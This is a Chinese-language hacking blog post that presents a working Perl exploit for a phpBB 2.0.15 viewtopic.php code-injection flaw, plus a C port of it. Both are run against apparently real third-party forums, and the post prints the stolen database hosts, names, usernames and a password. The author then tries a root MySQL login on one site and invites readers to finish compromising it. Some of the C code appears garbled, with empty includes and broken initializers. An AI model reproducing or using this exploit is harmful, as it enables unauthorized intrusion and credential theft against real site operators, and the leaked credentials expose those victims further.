前几天刚弄完PHPBB 2.0.15的远程执行漏洞,今天刚好又在网上看到了这个最新的一个漏洞.于是乎,当然测试先.一开代码是perl的,哈哈强项啊~~~:-)先把代码贴出来的说:
#!/usr/bin/perl
# **************************************************************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.securedgmailcom,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# **************************************************************
use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.securedgmailcom |\r\n";
print "+-----------------------------------------------------------------------+\r\n";
if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\/\///ge;
$delimit = "superloneEST";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";
print $sploit,"\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";
print "[+] Connecting OK\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}
使用方法就是:
phpbb.pl server path id [cookie]
server就是目标主机名或者ip,path就是对方的phpbb所在的目录,id呢就是一个存在的帖子的id,后面的cookie是在碰到某些论坛不允许匿名阅读帖子的情况下使用的.
我们来试试的说:
H:\temp>phpbb.pl boastology.com /forum/ 1266
+-----------------------------------------------------------------------+
| PhpBB 2.0.15 Database Authentication Details Exploit |
| By SecureD gvr.securedgmailcom |
+-----------------------------------------------------------------------+
[+] Connecting OK
[+] Sending exploit OK
[+] Database Host: localhost
[+] Database Name: boast_phpbb1
[+] Username: boast_phpbb1
[+] Password: cLuTa5OpQx
哇塞,好用的说~~当然,我们的目的是要把这个程序改成c代码,这样编译成exe文件携带方便~~~~这个exploit没什么难处,我就不多解释了...大家直接看代码就是(乱就讲究着看~~~):
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
#define BUFFERSIZE 102400
#define TAG "superloneEST"
char urlstring[]="GET %sviewtopic.php?t=%s"
"&highlight='.printf(superloneEST."
"$dbhost.superloneEST.$dbname.superloneEST.$dbuser.superloneEST.$dbpasswd.superloneEST).'"
" HTTP/1.1\r\n"
"Host: %s\r\n";
void usage(char*);
int main(int argc,char* argv[])
{
WSADATA wsadata;
SOCKETsock;
struct sockaddr_in sin;
struct hostent *pHostent;
struct in_addrip_addr;
char url[MAX_PATH]=;
char tid[12]=;
char host[256]=;
char cookie[MAX_PATH]=;
char *pszBuffer=NULL;
char info[4][1024];
printf("\n\n\t\t\tPHPbb 2.0.15 Database disclosure exploit\n\n");
printf("\t\t\tcodez by 无敌最寂寞[EST]\n\n");
if(argc<5 && argc >2)
{
if(argc==4)
{
strcpy(cookie,argv[3]);
}
if(strnicmp(argv[1],"http://",7) && !strrchr(argv[1]+7,'/'))
{
printf("[-]URL error!Check it,Baby!\n");
exit(0);
}
strcpy(url,argv[1]);
strncpy(host,argv[1]+7,strchr(argv[1]+7,'/')-argv[1]-7);
if(strlen(argv[2])>12)
{
printf("[-]topic idis too long!it must be less than 12 characters!\n");
exit(0);
}
strcpy(tid,argv[2]);
if((pszBuffer=(char*)malloc(BUFFERSIZE))==NULL)
{
printf("[-]Alloc memory error!\n");
exit(0);
}
printf("[+]Constructing malicious HTTTP Request.....");
sprintf(pszBuffer,urlstring,url,tid,host);
if(strlen(cookie)!=0)
{
strcat(pszBuffer,"Cookie: ");
strcat(pszBuffer,cookie);
strcat(pszBuffer,"\r\n");
}
strcat(pszBuffer,"Connection: close\r\n\r\n");
pszBuffer[strlen(pszBuffer)+1]='\0';
printf("DONE!\n");
}
else
{
usage(argv[0]);
exit(0);
}
if(WSAStartup(MAKEWORD(2,2),&wsadata)!=0)
{
printf("Load Winsock Err...\r\n");
exit(0);
}
pHostent = gethostbyname(host);
if (NULL == pHostent)
{
printf("[-]cannot retreive IP address of Host %s!\n",host);
exit(0);
}
printf("[+]Connecting to the server %s ......",host);
memcpy(&ip_addr,pHostent->h_addr_list[0],4);
memset(&sin,0,sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr = ip_addr;
sock = socket(AF_INET , SOCK_STREAM , IPPROTO_IP);
if (sock == INVALID_SOCKET)
{ printf("[-]SOCKET failed!\n");
return -1;
}
if (connect(sock,(struct sockaddr *)&sin,sizeof(sin)) != 0)
{
printf("ERROR!\n");
return -1;
}
//printf("%s",pszBuffer);
printf("DONE!\n");
printf("[+]SENDING DATA......");
if (send(sock,pszBuffer,strlen(pszBuffer),0) == SOCKET_ERROR)
{
printf("ERROR!\n");
return -1;
}
printf("DONE!\n");
memset(pszBuffer,0,BUFFERSIZE);
int j=0,rec=0;
int sendi=BUFFERSIZE;
while((rec = recv(sock, pszBuffer+j, sendi, 0)) > 0){
j += rec;
sendi -= rec;
}
if(rec<0){
printf("[-]Receiving Data Failed\r\n");
return 0;
}
//printf("%s",pszBuffer);
char* pos=strstr(pszBuffer,TAG);
char* pos1=NULL;
if(!pos)
{
printf("failed to get database info!\n");
free(pszBuffer);
return 0;
}
printf("\nGOT IT!!!\n\n");
int suc=1;
int length=0;
int i=0;
strcpy(pszBuffer,pos);
while(strlen(pszBuffer)>0 && i<4){
pos1=pszBuffer+12;
strcpy(pszBuffer,pos1);
pos=strstr(pszBuffer,TAG);
if(pos)
{
memset(info,0,1024);
strncpy(info,pszBuffer,pos-pszBuffer);
i++;
strcpy(pszBuffer,pos);
}
else
}
closesocket(sock);
free(pszBuffer);
if(suc==1)
{
Sleep(1000);
printf("[+] Database Host:%s\n",info[0]);
Sleep(1000);
printf("[+] Database Name:%s\n",info[1]);
Sleep(1000);
printf("[+] Username:%s\n",info[2]);
Sleep(1000);
printf("[+] Password:%s\n",info[3]);
Sleep(1000);
} else {
printf("FAILED\n");
}
return 1;
}
void usage(char* name)
{
printf("\tUsage:\n\t\t%s [cookie]\n\n",name);
printf("\t\t[cookie] used for authentication,it's optional!\n\n");
printf("\texample:\n\t\t%s http://wwww.xxxxx.com/forum/ 12345\n\n",name);
}
该代码在lcc下成功编译,让我们来测试的说:
H:\temp\lcc>phpbb http://boastology.com/forum/ 1266
PHPbb 2.0.15 Database disclosure exploit
codez by 无敌最寂寞[EST]
[+]Constructing malicious HTTTP Request.....DONE!
[+]Connecting to the server boastology.com ......DONE!
[+]SENDING DATA......DONE!
GOT IT!!!
[+] Database Host:localhost
[+] Database Name:boast_phpbb1
[+] Username:boast_phpbb1
[+] Password:cLuTa5OpQx
HOHO~~~再找个看看,如下:
H:\temp\lcc>phpbb http://www.tuoitho.net/diendan/ 15218
PHPbb 2.0.15 Database disclosure exploit
codez by 无敌最寂寞[EST]
[+]Constructing malicious HTTTP Request.....DONE!
[+]Connecting to the server www.tuoitho.net ......DONE!
[+]SENDING DATA......DONE!
GOT IT!!!
[+] Database Host:localhost
[+] Database Name:ttnet_forums
[+] Username:root
[+] Password:
哇塞,root用户的说,嘿嘿~~~密码还是空,我们连连看:
H:\tools\asist>mysql -h www.tuoitho.net -u root -p
Enter password:
ERROR 1130: Host '222.133.153.68' is not allowed to connect to this MySQL server
倒~~还不允许外部连接呢~~~好说的说,我们可以利用先前的那个代码执行漏洞或者再看看别的有没有什么漏洞,总之这个站是很好搞定的说~~~就交给大家~~~:-)
就这么简单啊~~希望对大家能有用处:
